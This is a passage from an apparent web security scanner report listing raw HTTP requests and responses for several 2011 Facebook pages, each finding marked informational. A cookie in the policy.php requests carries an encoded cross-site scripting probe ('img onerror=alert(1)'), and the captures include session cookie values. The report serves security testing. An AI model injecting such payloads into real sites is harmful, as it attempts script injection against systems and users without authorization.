Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.103.27
X-Cnection: close
Date: Thu, 05 May 2011 00:59:49 GMT
Content-Length: 12744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="u718953_1" class="fbConnectWidgetTopmost " style="height:328px; width:288px; border-color:white;font-family:&quot;verdana&quot;, sans-serif;"><div class="mhs pvm phs ConnectActivityLogin uiBoxWhite"><form action="/campaign/landing.php" target="_blank" onsubmit="return Event.__inlineSubmit(this,event)"><input name="campaign_id" value="137675572948107" type="hidden" /><input name="partner_id" value="techcrunch.com" type="hidden" /><input name="placement" value="recommendations" type="hidden" /><input name="extra_1" value="http://techcrunch.com/?icid=navbar_techcrunch_main5" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u718953_2"><input value="Sign Up" type="submit" id="u718953_2" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance(&quot;u718953_1&quot;).login();"><b>log in</b></a> to see what your friends are recommending.</div></div><div class="fbConnectWidgetContent phs pts"><div class="fbRecommendationWidgetContent" style="visibility:hidden;"><div class="UIImageBlock clearfix pas fbRecommendation RES_6948fd0ae148277b"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://techcrunch.com/2011/05/04/viber-to-release-free-calling-messaging-app-for-android-this-week/" title="Viber To Release Free Calling, Messaging App For Android This..Week" target="_top"><img class="img" src="http://tctechcrunch.files.wordpress.com/2011/05/viber-android.png" /></a><div class="UIImageBlock_Content UIImageBlock_SMALL_Content"><strong><a class="fbMonitor" href="http://techcrunch.com/2011/05/04/viber-to-release-free-calling-messaging-app-for-android-this-week/" target="_top">Viber To Release Free Calling, Messaging App For Android This..Week</a></strong><div class="recommendations_metadata">2,272 people shared this.</div></div></div><div class="UIImageBlock clearfix pas 
fbRecommendatio
...[SNIP]...

Request 2

GET /plugins/recommendations.php?site=techcrunch.com&width=290&height=330&header=false&colorscheme=light&font=verdana&border_color=white HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.107.43
X-Cnection: close
Date: Thu, 05 May 2011 01:00:26 GMT
Content-Length: 12632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="u722637_1" class="fbConnectWidgetTopmost " style="height:328px; width:288px; border-color:white;font-family:&quot;verdana&quot;, sans-serif;"><div class="mhs pvm phs ConnectActivityLogin uiBoxWhite"><form action="/campaign/landing.php" target="_blank" onsubmit="return Event.__inlineSubmit(this,event)"><input name="campaign_id" value="137675572948107" type="hidden" /><input name="partner_id" value="" type="hidden" /><input name="placement" value="recommendations" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u722638_2"><input value="Sign Up" type="submit" id="u722638_2" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance(&quot;u722637_1&quot;).login();"><b>log in</b></a> to see what your friends are recommending.</div></div><div class="fbConnectWidgetContent phs pts"><div class="fbRecommendationWidgetContent" style="visibility:hidden;"><div class="UIImageBlock clearfix pas fbRecommendation RES_6948fd0ae148277b"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://techcrunch.com/2011/05/04/viber-to-release-free-calling-messaging-app-for-android-this-week/" title="Viber To Release Free Calling, Messaging App For Android This..Week" target="_top"><img class="img" src="http://tctechcrunch.files.wordpress.com/2011/05/viber-android.png" /></a><div class="UIImageBlock_Content UIImageBlock_SMALL_Content"><strong><a class="fbMonitor" href="http://techcrunch.com/2011/05/04/viber-to-release-free-calling-messaging-app-for-android-this-week/" target="_top">Viber To Release Free Calling, Messaging App For Android This..Week</a></strong><div class="recommendations_metadata">2,272 people shared this.</div></div></div><div class="UIImageBlock clearfix pas fbRecommendation RES_21aae4e2fbf8aff8"><a class="fbImageContainer fbMonitor UIImageBlock_Image 
UIImageBlock_SMALL_Image" href="
...[SNIP]...

14.8. http://www.facebook.com/policy.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /policy.php

Request 1

GET /policy.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; act=1304613620616%2F2; _e_nXwy_1=%5B%22nXwy%22%2C1304613620617%2C%22act%22%2C1304613620616%2C2%2C%22http%3A%2F%2Fwww.facebook.com%2Fpolicy.php%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fr.php%3Fprofile_id%3D100000824820783%26next%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D100000824820783%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C657%2C204%2C12%2C981%2C16%5D

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.147.57
X-Cnection: close
Date: Thu, 05 May 2011 11:43:31 GMT
Content-Length: 58371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<span title="HPHP - 43 - Vrij83ZSThLD_1rhju_JGA - 688000"> Facebook .. 2011</span> .. <a rel="dialog" href="/ajax/intl/language_dialog.php?uri=http%3A%2F%2Fwww.facebook.com%2Fpolicy.php" title="Use Facebook in another language.">English (US)</a></div></div><div class="rfloat fsm fwn fcg" role="navigation"><a href="http://www.facebook.com/mobile?ref=pf" title="Check out Facebook Mobile.">Mobile</a> .. <a href="http://www.facebook.com/find-friends?ref=pf" title="Find anyone on the web.">Find Friends</a> .. <a href="http://www.facebook.com/badges?ref=pf" title="Embed a Facebook badge on your website.">Badges</a> .. <a href="http://www.facebook.com/directory/people/" title="Browse our people directory.">People</a> .. <a href="http://www.facebook.com/directory/pages/" title="Browse our pages directory.">Pages</a> .. <a href="http://www.facebook.com/facebook" accesskey="8" title="Read our blog, discover the resource center, and find job opportunities.">About</a> .. <a href="http://www.facebook.com/campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;extra_1=auto" title="Advertise on Facebook.">Advertising</a> .. <a href="/pages/create.php?ref_type=sitefooter" title="Create a Page">Create a Page</a> .. <a href="http://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a> .. <a href="http://www.facebook.com/careers/?ref=pf" title="Make your next career move to our awesome company.">Careers</a> .. <a href="http://www.facebook.com/privacy/explanation.php" title="Learn about your privacy and Facebook.">Privacy</a> .. <a href="http://www.facebook.com/terms.php?ref=pf" accesskey="9" title="Review our terms of service.">Terms</a> .. 
<a href="http://www.facebook.com/help/?ref=pf" accesskey="0" title="Visit our Help Center.">Help</a></div></div></div></div><script type="text/javascript">/*<![CDATA[*/function si_cj(m){setTimeout(function(){new Image().src="http:\/\/error.facebook.com\/common\/scribe_endpoint.php?c=si_clickjacking&t=8347"+"&m="+m;},5000);}if(top!=se
...[SNIP]...

Request 2

GET /policy.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; act=1304613620616%2F2; _e_nXwy_1=%5B%22nXwy%22%2C1304613620617%2C%22act%22%2C1304613620616%2C2%2C%22http%3A%2F%2Fwww.facebook.com%2Fpolicy.php%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fr.php%3Fprofile_id%3D100000824820783%26next%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D100000824820783%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C657%2C204%2C12%2C981%2C16%5D

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_1=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.71
X-Cnection: close
Date: Thu, 05 May 2011 11:43:35 GMT
Content-Length: 58049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<span title="HPHP - 43 - ZpGaQsAoZXPmRwbw4H5G_Q - 679808"> Facebook .. 2011</span> .. <a rel="dialog" href="/ajax/intl/language_dialog.php?uri=http%3A%2F%2Fwww.facebook.com%2Fpolicy.php" title="Use Facebook in another language.">English (US)</a></div></div><div class="rfloat fsm fwn fcg" role="navigation"><a href="http://www.facebook.com/mobile?ref=pf" title="Check out Facebook Mobile.">Mobile</a> .. <a href="http://www.facebook.com/find-friends?ref=pf" title="Find anyone on the web.">Find Friends</a> .. <a href="http://www.facebook.com/badges?ref=pf" title="Embed a Facebook badge on your website.">Badges</a> .. <a href="http://www.facebook.com/directory/people/" title="Browse our people directory.">People</a> .. <a href="http://www.facebook.com/directory/pages/" title="Browse our pages directory.">Pages</a> .. <a href="http://www.facebook.com/facebook" accesskey="8" title="Read our blog, discover the resource center, and find job opportunities.">About</a> .. <a href="http://www.facebook.com/campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;extra_1=auto" title="Advertise on Facebook.">Advertising</a> .. <a href="/pages/create.php?ref_type=sitefooter" title="Create a Page">Create a Page</a> .. <a href="http://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a> .. <a href="http://www.facebook.com/careers/?ref=pf" title="Make your next career move to our awesome company.">Careers</a> .. <a href="http://www.facebook.com/privacy/explanation.php" title="Learn about your privacy and Facebook.">Privacy</a> .. <a href="http://www.facebook.com/terms.php?ref=pf" accesskey="9" title="Review our terms of service.">Terms</a> .. 
<a href="http://www.facebook.com/help/?ref=pf" accesskey="0" title="Visit our Help Center.">Help</a></div></div></div></div><script type="text/javascript">/*<![CDATA[*/function si_cj(m){setTimeout(function(){new Image().src="http:\/\/error.facebook.com\/common\/scribe_endpoint.php?c=si_clickjacking&t=7507"+"&m="+m;},5000);}if(top!=se
...[SNIP]...

14.9. https://www.facebook.com/

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.facebook.com
Path:   /

Request 1

GET / HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.facebook.com/h02332
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-; lsd=T19_s; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fh02332; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fh02332

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.189.31
X-Cnection: close
Date: Thu, 05 May 2011 12:38:17 GMT
Content-Length: 31099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<label class="uiButton uiButtonConfirm" for="u909775_3"><input value="Login" tabindex="4" type="submit" id="u909775_3" /></label></td></tr><tr><td class="login_form_label_field"><input type="checkbox" class="inputcheckbox" value="1" id="persistent" name="persistent" tabindex="3" /><input type="hidden" name="default_persistent" value="0" /><label id="label_persistent" for="persistent">Keep me logged in</label></td><td class="login_form_label_field"><a href="http://www.facebook.com/recover.php" rel="nofollow">Forgot your password?</a></td></tr></table><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." /><input type="hidden" id="lsd" name="lsd" value="T19_s" autocomplete="off" /></form>
</div></div></div></div><div id="dropmenu_container"></div><div id="content" class="fb_content clearfix"><div><!-- 2365fa3194ecdc0cab15721ce967a9f8663937c7 --><div class="uiWashLayout"><div class="uiWashLayoutGradientWash"><div class="uiWashLayoutWashContent"><div class="contentContainer"><div class="clearfix fbIndexFeaturedRegistration"><div class="feature lfloat"><div class="plm fbIndexMap"><div class="plm title fsl fwb fcb">Facebook helps you connect and share with the people in your life.</div><div class="mtl map"></div></div></div><div class="signupForm rfloat"><div class="mbm phm headerTextContainer"><div class="mbs mainTitle fsl fwb fcb">Sign Up</div><div class="mbm subtitle fsm fwn fcg">It's free and always will be.</div></div><div id="registration_container"><div><noscript><div id="no_js_box"><h2>Javascript is disabled on your browser.</h2><p>Please enable JavaScript on your browser or upgrade to a Javascript-capable browser to register for Facebook.</p></div></noscript><div id="simple_registration_container" class="simple_registration_container"><div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event)&#123;return false;&#125;.call(this,event)!==false &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value=
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-; lsd=T19_s; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fh02332; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fh02332

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.151.83
X-Cnection: close
Date: Thu, 05 May 2011 12:38:23 GMT
Content-Length: 31031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<label class="uiButton uiButtonConfirm" for="u910363_3"><input value="Login" tabindex="4" type="submit" id="u910363_3" /></label></td></tr><tr><td class="login_form_label_field"><input type="checkbox" class="inputcheckbox" value="1" id="persistent" name="persistent" tabindex="3" /><input type="hidden" name="default_persistent" value="0" /><label id="label_persistent" for="persistent">Keep me logged in</label></td><td class="login_form_label_field"><a href="http://www.facebook.com/recover.php" rel="nofollow">Forgot your password?</a></td></tr></table><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." /><input type="hidden" id="lsd" name="lsd" value="T19_s" autocomplete="off" /></form>
</div></div></div></div><div id="dropmenu_container"></div><div id="content" class="fb_content clearfix"><div><!-- 2365fa3194ecdc0cab15721ce967a9f8663937c7 --><div class="uiWashLayout"><div class="uiWashLayoutGradientWash"><div class="uiWashLayoutWashContent"><div class="contentContainer"><div class="clearfix fbIndexFeaturedRegistration"><div class="feature lfloat"><div class="plm fbIndexMap"><div class="plm title fsl fwb fcb">Facebook helps you connect and share with the people in your life.</div><div class="mtl map"></div></div></div><div class="signupForm rfloat"><div class="mbm phm headerTextContainer"><div class="mbs mainTitle fsl fwb fcb">Sign Up</div><div class="mbm subtitle fsm fwn fcg">It's free and always will be.</div></div><div id="registration_container"><div><noscript><div id="no_js_box"><h2>Javascript is disabled on your browser.</h2><p>Please enable JavaScript on your browser or upgrade to a Javascript-capable browser to register for Facebook.</p></div></noscript><div id="simple_registration_container" class="simple_registration_container"><div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event)&#123;return false;&#125;.call(this,event)!==false &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value=
...[SNIP]...

14.10. https://www.facebook.com/h02332

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.facebook.com
Path:   /h02332

Request 1

POST /h02332 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.facebook.com/h02332
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-; lsd=T19_s
Content-Type: application/x-www-form-urlencoded
Content-Length: 779

post_form_id=76bac92d00ddc3f918cce3ae87a1177e&lsd=T19_s&captcha_persist_data=AQBeontrT_F0tu7Ahqufh0Nz_L57GC3z01jTVMayUpXS3RtmLp7gUAIWBcPgu66CfwG3bDSmtoZxxdfxY8Wj0BFJoRTL5R9qmmmGtfS7XvxLkrDktAk6_X9BzWt
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.185.122
X-Cnection: close
Date: Thu, 05 May 2011 12:38:10 GMT
Content-Length: 40951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<label class="uiButton uiButtonConfirm" for="u909025_1"><input value="Login" tabindex="4" type="submit" id="u909025_1" /></label></td></tr><tr><td class="login_form_label_field"><input type="checkbox" class="inputcheckbox" value="1" id="persistent" name="persistent" tabindex="3" /><input type="hidden" name="default_persistent" value="0" /><label id="label_persistent" for="persistent">Keep me logged in</label></td><td class="login_form_label_field"><a href="http://www.facebook.com/recover.php" rel="nofollow">Forgot your password?</a></td></tr></table><input type="hidden" id="next" name="next" value="https://www.facebook.com/h02332" autocomplete="off" /><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." /><input type="hidden" id="lsd" name="lsd" value="T19_s" autocomplete="off" /></form>
</div></div></div></div><div class="signup_bar_container"><div class="signup_box clearfix"><a class="signup_btn uiButton uiButtonSpecial uiButtonLarge" role="button" href="/r.php?locale=en_US"><span class="uiButtonText">Sign Up</span></a><span class="signup_box_content"><span>Facebook helps you connect and share with the people in your life.</span></span></div></div><div id="dropmenu_container"></div><div id="content" class="fb_content clearfix"><div id="mainContainer"><div id="leftColContainer"><div id="leftCol"><div id="pagelet_left_column"></div></div></div><div id="contentCol" class="clearfix hasRightCol"><div id="headerArea"><div id="pagelet_header"></div></div><div id="rightCol" role="complementary"><div id="pagelet_right_sidebar"></div></div><div id="contentArea" role="main"><div id="pagelet_main_column"></div></div><div id="bottomContent"></div></div></div></div><div id="pageFooter"><div id="contentCurve"></div><div class="clearfix" id="footerContainer"><div role="contentinfo" class="lfloat"><div class="fsm fwn fcg"><span title="HPHP - 26 - ZViC2TaHB3ILGz3ldJWObA - 169984"> Facebook .. 2011</span> .. <a rel="dialog" href="/ajax/intl/language_dialog.php?uri=https%3A%2F%2Fwww.facebook.com%2Fh023
...[SNIP]...

Request 2

POST /h02332 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-; lsd=T19_s
Content-Type: application/x-www-form-urlencoded
Content-Length: 779

post_form_id=76bac92d00ddc3f918cce3ae87a1177e&lsd=T19_s&captcha_persist_data=AQBeontrT_F0tu7Ahqufh0Nz_L57GC3z01jTVMayUpXS3RtmLp7gUAIWBcPgu66CfwG3bDSmtoZxxdfxY8Wj0BFJoRTL5R9qmmmGtfS7XvxLkrDktAk6_X9BzWt
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.28.38.108
X-Cnection: close
Date: Thu, 05 May 2011 12:38:53 GMT
Content-Length: 40883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<label class="uiButton uiButtonConfirm" for="u913341_1"><input value="Login" tabindex="4" type="submit" id="u913341_1" /></label></td></tr><tr><td class="login_form_label_field"><input type="checkbox" class="inputcheckbox" value="1" id="persistent" name="persistent" tabindex="3" /><input type="hidden" name="default_persistent" value="0" /><label id="label_persistent" for="persistent">Keep me logged in</label></td><td class="login_form_label_field"><a href="http://www.facebook.com/recover.php" rel="nofollow">Forgot your password?</a></td></tr></table><input type="hidden" id="next" name="next" value="https://www.facebook.com/h02332" autocomplete="off" /><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." /><input type="hidden" id="lsd" name="lsd" value="T19_s" autocomplete="off" /></form>
</div></div></div></div><div class="signup_bar_container"><div class="signup_box clearfix"><a class="signup_btn uiButton uiButtonSpecial uiButtonLarge" role="button" href="/r.php?locale=en_US"><span class="uiButtonText">Sign Up</span></a><span class="signup_box_content"><span>Facebook helps you connect and share with the people in your life.</span></span></div></div><div id="dropmenu_container"></div><div id="content" class="fb_content clearfix"><div id="mainContainer"><div id="leftColContainer"><div id="leftCol"><div id="pagelet_left_column"></div></div></div><div id="contentCol" class="clearfix hasRightCol"><div id="headerArea"><div id="pagelet_header"></div></div><div id="rightCol" role="complementary"><div id="pagelet_right_sidebar"></div></div><div id="contentArea" role="main"><div id="pagelet_main_column"></div></div><div id="bottomContent"></div></div></div></div><div id="pageFooter"><div id="contentCurve"></div><div class="clearfix" id="footerContainer"><div role="contentinfo" class="lfloat"><div class="fsm fwn fcg"><span title="HPHP - 24 - UZYunW_t88lyAzr2UT6zrg - 187392"> Facebook .. 2011</span> .. <a rel="dialog" href="/ajax/intl/language_dialog.php?uri=https%3A%2F%2Fwww.facebook.com%2Fh023
...[SNIP]...

14.11. https://www.facebook.com/help/contact.php

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.facebook.com
Path:   /help/contact.php

Request 1

GET /help/contact.php?show_form=cannot_identify&flow=pw_reset HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/recover.php?locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
